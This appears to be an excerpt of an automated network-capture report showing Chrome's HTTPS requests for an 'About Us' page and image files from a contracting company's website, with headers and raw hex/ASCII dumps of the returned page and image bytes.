                                              Data Ascii: 2000<!DOCTYPE HTML><html lang="en"><head> ...=============== basic ===============--> <meta charset="UTF-8"> <title>About Us</title> <meta name="description" content="We use the latest technologies in orde
                                              2024-09-27 06:19:59 UTC395INData Raw: 46 73 54 35 39 6a 71 77 4b 7a 41 37 59 46 75 50 42 49 5a 35 4c 48 38 45 63 46 6b 56 50 2b 64 6a 2b 35 2f 6d 2f 7a 4e 43 41 59 43 49 2b 48 41 6f 64 73 69 50 62 35 39 68 32 66 5a 2b 44 4e 6a 57 78 62 45 74 68 37 35 4d 42 76 61 6e 75 71 78 37 72 6f 66 2f 70 77 45 76 65 47 79 72 4a 45 67 42 67 49 69 34 74 68 72 56 50 61 31 57 61 68 4b 77 4e 54 41 2b 63 48 75 76 77 61 59 37 66 44 6d 4b 39 6c 50 39 74 71 51 7a 74 67 44 54 70 57 65 42 6d 52 37 62 4b 67 6c 53 41 43 41 69 4c 76 55 47 37 73 54 76 79 58 64 67 43 2b 4a 32 42 45 59 48 62 75 38 68 77 4b 59 65 79 37 2b 62 79 72 62 38 6c 56 6f 58 39 34 47 4a 35 76 38 7a 52 41 47 41 69 4c 68 30 41 37 43 6b 35 32 73 30 41 76 74 67 54 36 4d 68 44 51 59 75 38 6c 6a 2b 56 38 42 68 4e 66 79 38 6a 2f 33 2f 43 67 41 79 52 41 47
                                              Data Ascii: FsT59jqwKzA7YFuPBIZ5LH8EcFkVP+dj+5/m/zNCAYCI+HAodsiPb59h2fZ+DNjWxbEth75MBvanuqx7rof/pwEveGyrJEgBgIi4thrVPa1WahKwNTA+cHuvwaY7fDmK9lP9tqQztgDTpWeBmR7bKglSACAiLvUG7sTvyXdgC+J2BEYHbu8hwKYey7+byrb8lVoX94GJ5v8zRAGAiLh0A7Ck52s0AvtgT6MhDQYu8lj+V8BhNfy8j/3/CgAyRAG
                                              2024-09-27 06:19:59 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:19:59 UTC8192INData Raw: 32 30 30 30 0d 0a 65 64 45 6e 44 2f 78 6d 6a 41 45 42 45 61 6c 45 50 33 49 7a 4e 68 2f 76 30 4c 50 42 4c 34 6e 67 43 2f 53 76 2b 6b 68 73 31 41 50 74 52 2b 37 5a 47 48 66 38 72 37 56 49 41 49 43 4b 31 4f 41 33 59 30 76 4d 31 52 6d 4d 72 2f 73 73 39 2b 74 61 6e 50 66 47 37 7a 75 45 43 34 48 6b 48 35 66 67 34 2f 76 63 7a 6a 2b 32 57 41 42 51 41 69 45 69 31 4e 67 58 4f 39 6e 79 4e 38 64 68 63 2b 36 54 51 6a 51 58 36 41 33 2f 32 57 50 36 62 77 46 6b 4f 79 6c 6b 63 57 4e 70 78 33 66 54 30 6e 30 45 4b 41 45 53 6b 47 6f 4f 41 57 2f 48 37 47 54 49 54 65 39 71 4f 35 63 6e 7a 7a 39 68 36 42 78 39 2b 77 72 59 32 75 6b 69 79 6f 2b 31 2f 55 68 59 46 41 43 4a 53 71 51 37 41 50 34 45 42 6e 71 39 7a 41 76 42 79 36 4d 59 57 62 49 32 64 78 4f 66 4c 36 63 44 62 6a 73 70 79
                                              Data Ascii: 2000edEnD/xmjAEBEalEP3IzNh/v0LPBL4ngC/Sv+khs1APtR+7ZGHf8r7VIAICK1OA3Y0vM1RmMr/ss9+tanPfG7zuEC4HkH5fg4/vczj+2WABQAiEi1NgXO9nyN8dhc+6TQjQX6A3/2WP6bwFkOylkcWNpx3fT0n0EKAESkGoOAW/H7GTITe9qO5cnzz9h6Bx9+wrY2ukiyo+1/UhYFACJSqQ7AP4EBnq9zAvBy6MYWbI2dxOfL6cDbjspy
                                              2024-09-27 06:19:59 UTC6INData Raw: 51 42 59 79 2f 46
                                              Data Ascii: QBYy/F
                                              2024-09-27 06:19:59 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:19:59 UTC8192INData Raw: 32 30 30 30 0d 0a 31 50 73 4e 57 76 61 66 46 55 73 42 42 6e 73 71 2b 50 48 54 6a 52 49 6f 55 41 49 69 34 39 30 72 6f 43 70 54 68 4c 65 44 68 56 76 37 4e 39 51 6a 41 71 4e 43 4e 72 64 41 46 56 48 39 38 63 6c 73 2b 41 6d 34 4a 33 54 69 52 49 67 55 41 49 75 36 39 42 2f 77 51 75 68 4c 74 4f 4a 4b 57 74 36 46 31 77 76 32 4a 64 79 2b 46 62 6d 77 46 64 67 4a 2b 37 71 6e 73 33 36 4f 74 66 78 49 52 42 51 41 69 37 6a 55 43 72 34 57 75 52 42 73 75 78 4e 4c 51 74 75 52 6e 51 46 66 48 31 30 74 4c 41 4e 41 62 75 4d 4a 54 32 57 50 51 30 37 39 45 52 67 47 41 69 42 2b 78 72 67 4d 34 6c 62 62 33 74 72 73 65 2f 70 2b 46 4c 58 78 4c 67 77 75 42 68 54 79 56 66 54 59 77 4a 33 51 44 52 55 6f 70 41 42 44 78 49 37 5a 31 41 50 38 46 64 67 62 4f 61 2b 66 37 58 43 38 41 66 42 4f 59
                                              Data Ascii: 20001PsNWvafFUsBBnsq+PHTjRIoUAIi490roCpThLeDhVv7N9QjAqNCNrdAFVH98cls+Am4J3TiRIgUAIu69B/wQuhLtOJKWt6F1wv2Jdy+FbmwFdgJ+7qns36OtfxIRBQAi7jUCr4WuRBsuxNLQtuRnQFfH10tLANAbuMJT2WPQ079ERgGAiB+xrgM4lbb3trse/p+FLXxLgwuBhTyVfTYwJ3QDRUopABDxI7Z1AP8FdgbOa+f7XC8AfBOY
                                              2024-09-27 06:19:59 UTC6INData Raw: 46 54 49 53 77 41
                                              Data Ascii: FTISwA
                                              2024-09-27 06:19:59 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:19:59 UTC8192INData Raw: 32 30 30 30 0d 0a 41 46 73 32 4e 49 4e 6e 46 51 54 4f 78 70 38 4a 33 73 65 48 37 64 77 75 76 39 34 6b 7a 36 55 59 35 75 67 49 2f 42 77 37 43 74 70 55 6c 66 65 5a 39 6d 6e 79 44 44 57 6c 65 51 65 73 72 37 39 74 79 4d 52 59 49 2b 46 4a 38 32 76 4c 35 6e 72 67 45 43 77 41 71 31 52 73 34 45 6b 74 57 6b 35 57 54 37 58 77 6f 48 73 39 39 4c 62 62 37 5a 30 62 6f 43 6b 57 67 49 7a 61 69 63 46 41 56 50 7a 73 48 32 49 4a 6b 74 71 63 47 6c 36 63 41 41 47 42 58 37 42 66 44 39 52 6e 49 4d 32 68 4b 4b 46 50 36 2b 70 44 73 48 4a 6d 37 43 76 59 6b 74 6a 64 2b 35 34 71 7a 61 44 49 57 42 4a 78 50 5a 56 73 4a 4f 77 49 6a 69 58 2f 36 71 6a 58 50 59 35 6b 34 4b 33 6b 50 39 4d 4b 47 2b 59 38 6b 6a 6b 51 30 61 54 49 4a 57 34 74 79 44 65 6c 5a 4c 2b 44 54 30 56 67 41 57 6d 34 57
                                              Data Ascii: 2000AFs2NINnFQTOxp8J3seH7dwuv94kz6UY5ugI/Bw7CtpUlfeZ9mnyDDWleQesr79tyMRYI+FJ82vL5nrgECwAq1Rs4EktWk5WT7XwoHs99Lbb7Z0boCkWgIzaicFAVPzsH2IJktqcGl6cAAGBX7BfD9RnIM2hKKFP6+pDsHJm7CvYktjd+54qzaDIWBJxPZVsJOwIjiX/6qjXPY5k4K3kP9MKG+Y8kjkQ0aTIJW4tyDelZL+DT0VgAWm4W


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              58192.168.2.465391173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:02 UTC719OUTGET /uploads/dynamic/6/d1cf623cfda2ed689fc6281afcfa75de.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/about
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:02 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:02 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Sat, 14 Jan 2023 12:40:00 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 244136
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:02 UTC7930INData Raw: 52 49 46 46 a0 b9 03 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ff 03 00 ff 02 00 56 50 38 20 2c b9 03 00 30 51 09 9d 01 2a 00 04 00 03 3e 61 24 8d 45 24 22 21 1a 7c 36 b4 40 06 04 b4 b6 c6 ff f6 ec 7c ba e4 07 76 35 93 fc c7 f6 1f f2 9f e1 ff 71 bf c4 fa 1b f9 2f cf ff 95 fe eb fe 67 fe 3f f8 2f 90 af ad 7f da ff 2f df b7 d3 ff 8c ff b9 fe 7b fd 7f b0 7f cb 7e ff 7e cf fb d7 f9 ef fc 9f e5 3f 7c be e6 7f 15 ff 3b fc c7 fa 0f fd 3f e8 3d 1b f8 c9 fe 37 f8 cf f4 bf fb ff d4 7c 82 fe 5f fd 3f fd 57 f7 bf f3 3f f8 7f c6 7e f7 fd 51 7d 27 fd ff f4 bf ea ff 64 fc 66 76 ff f3 df f7 ff d3 7f aa f7 05 f6 9f eb 7f ef 3f c1 7f 9c ff e1 fe 77 df 43 e4 ff eb ff 98 ff 5d ec 5f ea ff e1 7f eb 7f 91 ff 51 ff db fd 9f ff ff fe df a0 3f cf 7f b0 ff c1 ff 0b fe 87
                                              Data Ascii: RIFFWEBPVP8XVP8 ,0Q*>a$E$"!|6@|v5q/g?//{~~?|;?=7|_?W?~Q}'dfv?wC]_Q?
                                              2024-09-27 06:20:02 UTC8000INData Raw: 20 15 8c 51 9b 4a e9 21 ef e3 2e fe f1 f4 ae 97 26 7b df 64 18 38 55 3e 4d 40 3f 31 42 ca fc ef 5c ad e7 82 73 af d4 5c 6f 14 04 3c dd 83 e7 96 60 54 5e 13 45 ad 58 3c f2 8c 99 e7 3e ab 29 6b 93 50 ac 48 a8 13 93 a5 64 49 cd 00 47 81 ee 64 06 e8 c6 b6 7f 92 dc 2b 7b c3 1e ff 3e 5e 91 e1 e9 44 d3 33 f0 c3 9e 47 df da f6 40 a3 45 3f 7e 3b 48 cb b8 d1 92 58 9f 4c 42 71 b4 62 87 a7 6f d3 ed 3a 7f 10 01 45 bd ab 31 94 3c 57 f3 bd 95 1d 1c 2f dc b6 02 a5 f0 d4 5c d4 ab 72 a8 ca ed af 87 e6 bc ea b8 3c fc 83 2f 7d 17 c2 b9 7c 13 29 1f b2 2b 44 cc 36 ac e4 45 fb 21 a9 7b e9 4c e2 52 a8 4f 87 7d f9 dd 36 89 7e 07 d2 32 f5 c0 6b 62 c7 a4 1a 0a 0a 63 6a 27 f9 48 be 34 c7 f1 3c c5 70 1f fc 2c 2b 04 46 64 b0 3d 40 28 1f bb a9 63 03 1a f3 c7 d6 9c d0 7e 1d fe 33 de 2f
                                              Data Ascii: QJ!.&{d8U>M@?1B\s\o<`T^EX<>)kPHdIGd+{>^D3G@E?~;HXLBqbo:E1<W/\r</}|)+D6E!{LRO}6~2kbcj'H4<p,+Fd=@(c~3/
                                              2024-09-27 06:20:02 UTC8000INData Raw: 11 68 89 d7 0b 7a 43 c8 47 91 47 d7 0f d8 7c 3c ba 81 d3 9a 71 2a c4 d0 d8 92 40 bb 3c c3 5d 48 c4 5c fe 7a 4f e4 51 5d cb ac 07 bc 62 15 ca e6 aa 8a 17 22 a6 cb 3e 93 de 69 e2 c6 ae 92 48 0f d6 70 4d 92 d5 3a 41 93 a7 3b 76 01 27 9d 90 e3 85 07 9d 2f 59 b6 69 79 29 b0 6d c8 34 42 01 2a 4a 58 7c 7a 08 d8 7f 78 75 5a 95 7e 97 84 1b d3 09 6c 71 e7 97 03 e5 71 49 79 f2 c5 36 c9 bf ff f0 53 f5 96 5d d0 a4 ec bc c8 40 8f b3 e5 08 f0 5a 41 20 61 ad b8 33 c3 61 24 9a df 7a 3e 7b b1 5f 7c 52 e0 80 2f 29 a3 b3 49 3e 1e 4d e2 bc 3e 13 6a 0c eb 6e b7 be 9d 74 59 ad d4 07 7d 34 bd b2 50 46 15 f1 88 3d 31 00 d9 21 ae 0f 16 2a 2d 2a a8 e9 00 6a 21 3f e2 3d 07 ce 31 d8 15 45 14 a6 a9 2e af 5d ed 53 49 58 76 03 a4 c0 8b 4d fb 24 c9 88 47 89 3a 77 1a bd 12 36 08 30 04 50
                                              Data Ascii: hzCGG|<q*@<]H\zOQ]b">iHpM:A;v'/Yiy)m4B*JX|zxuZ~lqqIy6S]@ZA a3a$z>{_|R/)I>M>jntY}4PF=1!*-*j!?=1E.]SIXvM$G:w60P
                                              2024-09-27 06:20:02 UTC8000INData Raw: 0f d5 af cf 5e 44 7f 24 a7 c4 8e 35 dc 98 64 3d 6f da 88 0f 39 49 d7 f5 55 32 9c 19 8d f0 de ac c4 3c e0 47 40 b8 ff f2 27 a3 ae 29 4e 0d 8f 42 56 85 9c 11 cd ed 5e 20 ab 59 af cb c9 52 22 98 4e 84 1b f4 e4 35 21 8a ea 86 d3 45 d0 13 08 95 d9 e8 4a 61 52 44 44 b6 b1 21 30 e2 6f d7 a5 5b 34 88 b3 96 19 7b 0d 4e 0c 65 7b bf af b7 53 ec 8f 63 0d 5c 3e e8 15 aa 93 8a 62 c6 cf 52 53 b3 45 25 31 e3 6e b7 b1 85 7f 5d 12 89 10 18 1e 8c c4 c0 93 18 e0 cc 89 d1 66 1d 0b b9 a5 8a 22 2f 75 54 23 8d b7 dc 14 a7 9c 8a 29 6c dd 7a 12 1c 74 38 0c f7 ef 81 c0 dd 4b 47 fb 40 c6 9c ff ea e4 d3 a5 ee 86 7a 6c 39 b1 d8 25 d7 47 71 ea d2 55 12 e3 02 1c c2 3f ff 1a 50 0e 5e 2d b4 05 2e fd 11 c8 22 fd b6 e5 a9 bf d2 d5 5a cb 61 78 fd c5 37 24 95 1f d7 77 8f 55 e8 a2 ae 51 b4 20
                                              Data Ascii: ^D$5d=o9IU2<G@')NBV^ YR"N5!EJaRDD!0o[4{Ne{Sc\>bRSE%1n]f"/uT#)lzt8KG@zl9%GqU?P^-."Zax7$wUQ
                                              2024-09-27 06:20:02 UTC8000INData Raw: ac f1 5b 01 69 f0 74 fb 0b 11 80 1d 62 e6 64 6c f1 dd df 78 9a 46 08 30 19 e4 9e 14 ad 13 59 7c 12 a3 4a e2 74 37 4f 9c 00 65 48 72 b8 ba 6e d9 70 9c 24 68 2c 6c 8b c5 c4 25 6f 27 b8 d2 24 8b b8 f7 2f 40 42 74 e8 00 68 82 39 99 08 b9 6e e1 59 02 35 a3 27 fc 6b d5 a8 44 5f 9e 68 33 49 7a 7e a6 6d 5f ff 9c ac 66 7f 5e a9 b4 7a e7 ba 7c de 27 84 08 44 d2 fd 05 b7 7a 13 5e 61 cc fc 45 f7 82 e9 c3 c3 4d 70 d5 6d 7c 49 cd 10 03 47 19 30 0b 05 de aa d6 0c 7d 98 79 6a d1 2b 70 26 9f 85 dd df e3 6c 4d 4a 11 90 35 4e 4d 95 73 67 27 4c 39 7e f3 38 05 5c 34 7f ea 6c 62 74 7d 24 3a 9d d0 29 8c 0f 60 dd 6c 0e 90 19 71 ec 33 25 ec b5 97 aa eb 88 7f 76 5d a1 55 7b fa bd b1 f2 16 8c cb 27 3e 70 05 ad a7 7a ee 2c c1 7a 07 3c 4a 1c 17 25 82 5f d4 8b 90 7a 93 d0 f4 45 c2 43
                                              Data Ascii: [itbdlxF0Y|Jt7OeHrnp$h,l%o'$/@Bth9nY5'kD_h3Iz~m_f^z|'Dz^aEMpm|IG0}yj+p&lMJ5NMsg'L9~8\4lbt}$:)`lq3%v]U{'>pz,z<J%_zEC
                                              2024-09-27 06:20:02 UTC8000INData Raw: cf 34 72 c0 dd ea 7d 24 af e4 b2 4a 35 e8 7f f5 bf d4 52 a1 29 32 cd 2a ba af 80 cd 9b 84 cc 3d 4c 3d 7b ba b3 74 85 70 83 bb 92 84 b7 a9 28 ba a9 0d 60 0f 67 cf b9 b0 ca 6c 54 c1 d7 d6 22 3e 97 55 5b 24 9c 09 73 73 02 8f 0a c9 ca 2a 7c 2e 1f 2f 47 fa 99 a4 9a 3a fa 32 bc b4 8c 81 a9 3d 46 63 36 79 4f b6 30 0a c2 25 81 cf 74 5a 0c 5a 4e 45 7b 91 82 65 1a 57 0a 8d 46 e3 d3 32 77 5a 93 0f 29 0f 70 1f d5 63 cc 86 b6 f8 d6 86 b2 2b ba 1a eb 38 87 f5 13 7f a3 24 3e e2 58 05 db 9e 23 0f f2 60 28 8a fc 41 18 d6 26 d2 ce 94 8c dd 91 eb a2 c5 4b 10 06 01 73 ac ce 1e 2b 5c 05 1b de 2c a0 fd 66 ee b7 76 12 03 1a 58 10 b7 a0 a2 c0 49 79 ad 13 66 7c 2e 52 a5 6e 38 b3 f9 4f ae 22 26 8f e8 ac ac ec 95 33 82 16 cd 05 a9 fe 64 0f df 59 2d 28 e4 de 0c 34 55 7f 26 2e 00 51
                                              Data Ascii: 4r}$J5R)2*=L={tp(`glT">U[$ss*|./G:2=Fc6yO0%tZZNE{eWF2wZ)pc+8$>X#`(A&Ks+\,fvXIyf|.Rn8O"&3dY-(4U&.Q
                                              2024-09-27 06:20:02 UTC8000INData Raw: 1c 50 a2 10 6b 50 55 73 44 be d2 09 8f f5 8b 46 60 75 26 e3 7e 14 78 6a d1 e2 59 0d 06 e5 5d ab 2e 9f 5b 8a 35 99 0f 56 0d 54 04 26 ee 5f a1 7a 86 73 5d ee fe d4 c3 f6 5b 35 7a 7b 66 74 ec 1c b3 15 39 56 4b 2d 86 a5 70 4c ef ee ea ec 4e 47 0a 04 1f ce 14 9c e0 67 1c 7a 2c c0 d9 2b a9 ec de f7 95 2a c4 a8 f2 9f 73 f6 be 61 08 17 fe 86 21 84 8f f2 9d 36 03 d5 89 56 6f 91 f4 5e 74 31 88 9a 5f b5 f0 66 4c 3c bd a2 09 a4 45 89 5d dd 00 0e 4c 76 20 f4 24 f7 a0 6b 08 9e fa fb b8 2f c6 a4 3b d5 3a 16 c5 ad ce b5 76 c5 44 60 e0 1e 2a 0f 28 67 6d c0 00 b7 b3 21 ae e3 f8 1c e5 43 70 8c 89 97 e8 cb d7 57 44 39 8c e4 3c 8f fe 67 d0 23 b4 33 70 aa 5b 09 29 26 73 f0 78 dd 3d ec 71 cd 67 f5 51 f0 d6 a5 20 f0 2e 62 74 99 39 c7 c1 07 08 64 4e 3d 20 0c 31 a3 6c 9d e1 6b 76
                                              Data Ascii: PkPUsDF`u&~xjY].[5VT&_zs][5z{ft9VK-pLNGgz,+*sa!6Vo^t1_fL<E]Lv $k/;:vD`*(gm!CpWD9<g#3p[)&sx=qgQ .bt9dN= 1lkv
                                              2024-09-27 06:20:02 UTC8000INData Raw: d0 c0 3c e2 9b f4 7c 4f 8b 4b ac 81 2f a7 8c 90 08 e2 6d cc ae e0 06 d7 02 2c d2 31 86 66 ac 32 cf a0 d1 9d 0d 23 b2 18 ba 91 9c 9b 57 ec a2 01 3e da 3a 60 a2 11 53 1d 8e 19 60 e4 0a e2 13 62 10 f4 36 45 4e 4d a4 24 2d ba 13 65 7c b5 e1 e1 b5 9c 0b 15 09 b3 23 9a ff f8 ad 44 e0 0e 7a 51 58 e3 2a bb 78 39 3e b0 f3 d2 ff 47 d8 e2 f9 13 e9 d2 c6 d3 4d ab 26 c7 d9 2b 57 50 86 d3 47 47 61 14 be c5 f3 fc d4 05 04 7d 5f e1 70 95 6d ab b1 79 0b ab 29 60 61 92 35 a2 19 b3 ce 7d 60 f3 44 d8 90 70 c9 5d 2a 07 35 b3 a1 72 55 54 bc 64 ad a4 33 38 11 33 f7 a5 54 ff a4 aa 80 84 9f f9 97 55 97 ce 09 3a bf 7c 99 2f 38 c9 48 9a 30 03 a7 f2 bd 64 5c 02 62 60 1b 3e 2a 52 50 bf 0e 9a 0a 2d 4f 4d 92 2a 7c 66 d3 c2 de 3c bf 6d b7 42 b8 59 a4 26 88 68 34 5e 83 7e e9 fe 15 74 0c
                                              Data Ascii: <|OK/m,1f2#W>:`S`b6ENM$-e|#DzQX*x9>GM&+WPGGa}_pmy)`a5}`Dp]*5rUTd383TU:|/8H0d\b`>*RP-OM*|f<mBY&h4^~t
                                              2024-09-27 06:20:02 UTC8000INData Raw: cd 73 67 5a fd 23 2f 06 96 d7 9b fc 6b ef 54 ac d5 22 e3 72 3b 2f 64 fd 96 e0 b2 be ca ef e9 a0 3c 09 d3 1b 97 4f b0 ae 47 5c a3 f5 a8 f8 49 b6 d9 4d cd 6a 2a 26 6d 6a 94 7a 82 60 03 4c 3c a0 fa 43 42 05 72 0b 28 0e 4d 72 49 67 48 6a d8 fd d9 93 b5 33 5b cd cd 0d 8a e7 1b 45 7a 4d 86 e9 b1 c4 f8 6b ab 5c eb f8 b3 12 43 ae d9 ce c7 f0 f7 4e c0 20 48 b4 99 da fd 82 62 48 cd 14 69 7d b5 96 24 f6 d4 6f ef d5 4b 4e 71 0c 49 ea ee 05 d0 aa 7c 02 b0 60 ce 40 87 c9 47 e1 5d 05 ce 4b 69 b4 a5 e8 31 f5 20 5e 04 49 56 1a 05 e0 31 91 7a d9 11 32 cf 9a 40 43 e9 09 99 7a bb 14 fd 6f 38 03 fb 0c 08 7d cc 6c 68 f9 ee 54 87 fd 3e 31 ab 85 ac 49 84 af 50 b9 b9 1e 8d c9 33 aa 85 39 53 94 cf 3f d3 25 32 e3 18 86 f6 90 0b e8 65 27 57 08 f1 6d c0 17 b2 e5 cf 4c a0 94 5b fa 2c
                                              Data Ascii: sgZ#/kT"r;/d<OG\IMj*&mjz`L<CBr(MrIgHj3[EzMk\CN HbHi}$oKNqI|`@G]Ki1 ^IV1z2@Czo8}lhT>1IP39S?%2e'WmL[,
                                              2024-09-27 06:20:02 UTC8000INData Raw: 1e 3a b5 0f ca 3b c0 c2 5c d0 74 7f 7f 51 e9 cc cf 7e 5b 32 db 4a 13 a9 f3 3f f6 36 5a 3b dd dc 8f ed a8 02 ae 9e 75 c7 cb 5a 36 48 72 d1 44 8c e5 8b 70 f8 90 6d 67 8c b2 57 cc f5 14 1d af 12 bf fb d1 69 cd 04 09 58 3d 57 11 e9 2e bc 8c 84 f6 aa 54 08 62 85 29 df ed af a2 a9 f5 ef be 9e 8d d4 f3 a6 5d 2c 1e ce 14 f7 1f b2 25 0d 17 68 81 c4 65 02 fe 96 c0 c1 06 4f 3c 16 fd 44 3c 84 57 db 5e 6e fa 7e 7a 49 56 6d 49 56 9e cb c0 c8 4f bb 3b 1d fd a6 ad 6f 39 83 0e 0a 01 c9 cd a6 28 5f dd 87 6a 3b af 8c c1 47 3f ab 60 3d b5 d8 36 e5 48 b5 bb 02 54 a9 44 53 69 2f 42 e0 ce 94 a7 77 35 58 1c c2 37 90 41 fc fa 51 28 02 49 8c 5b d1 03 09 10 6d 8a fe ee d2 d2 1f 0d 41 ad 7c 44 40 fd 96 a0 f8 ec 58 e4 e0 8f 49 6e 69 c2 26 42 4b d1 3a b9 5a e1 9d ca aa d9 ab c5 ee 9d
                                              Data Ascii: :;\tQ~[2J?6Z;uZ6HrDpmgWiX=W.Tb)],%heO<D<W^n~zIVmIVO;o9(_j;G?`=6HTDSi/Bw5X7AQ(I[mA|D@XIni&BK:Z


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              59192.168.2.465393173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:02 UTC680OUTGET /images/bg/14.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/about
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:03 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:02 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:22:48 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 165418
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:03 UTC7930INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 29 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 33 35 32 2c 20 32 30 32 30 2f 30 31 2f 33 30 2d 31 35 3a 35 30 3a 33 38 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                              Data Ascii: ExifII*Ducky)http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xm
                                              2024-09-27 06:20:03 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 12 08 24 08 7b 13 66 8b 62 ae ad 38 be 27 bd 75 33 74 b4 e1 7a ee d0 ad 8c 95 69 c2 5b 23 27 e0 5f 67 b0 0d 6d 52 a0 ec e2 75 b4 f4 71 ea 7d c6 de 1d 3c 32 b1 35 3f 77 6e 9a f7 1b 65 4d 73 97 14 92 6d 2d 35 2a 5d cb 9d 92 ae 2a 5f 97 5b e2 8b fa d1 7f 74 0b 2a aa d3 49 b6 da dd b4 8b ac 85 34 ce e5 a7 0c 16 b2 d3 61 4d f2 dc 89 59 65 b2 c8 94 67 25 c3 0d 1f 47 69 a6 de 53 5d 18 8a ab 72 ec f2 fe b2 93 d9 3e c6 04 d2 ae e6 cd 5f 6a 70 c1 5e e5 5d 33 6b a5 b2 97 36 e6 71 87 2d cd ab 0a c4 ef aa 5e 34 be a4 7b 0e e2 83 85 49 55 b6 1c 1a 46 0b b8 f3 8b 91 c7 15 5d 0b 5e b6 66 a6 e5 d8 db 03 bb 83 64 e7 85 8f 65 eb 59 59 08 f1 27 bb 76 c6
                                              Data Ascii: @${fb8'u3tzi[#'_gmRuq}<25?wneMsm-5*]*_[t*I4aMYeg%GiS]r>_jp^]3k6q-^4{IUF]^fdeYY'v
                                              2024-09-27 06:20:03 UTC8000INData Raw: ce d9 4a 5f 43 67 72 ac 6c 7a 52 54 d5 0a d2 fb 31 4b d8 64 bd ed de 9e b3 20 39 f9 bc aa 17 4f e2 71 a6 f1 f2 96 eb 23 b9 f6 38 ee 35 55 cd 2d c7 b2 38 dc ca bf 2a 6f 75 cb 6d 6f b5 be 83 a9 25 ea 35 df 45 39 15 3a 72 20 ac 84 b7 a9 6e 03 35 38 ca 2a 51 7c 51 7b 9a da 83 7b 96 fe d3 90 f0 f3 f9 63 76 72 f9 3b f1 96 d9 e3 4f 6c b4 ea af a8 b7 85 cc f1 73 17 0c 5f 05 cb de a6 5b 25 07 da 05 b9 d7 0b 22 eb 9c 54 a3 25 a3 4d 6a 9f a0 f2 f9 9f 2e 65 72 eb a5 9f f2 f4 b8 5e ba db 85 27 e0 97 5b 4d ee 3d 57 d0 ba 48 7a ad db 7b 80 e1 f2 8f 99 68 cb 93 c7 ca 4e 8c c8 6c 9d 33 5c 2f 5f bb ae f3 b6 f8 27 17 ae d8 b3 9d cd b9 0e 17 35 8f 1d 89 d3 93 1f d3 c9 af c3 64 5f 7f 51 c6 af 98 f3 6e 43 35 47 35 87 99 8b ae 95 e6 c5 78 3b 38 fa 75 03 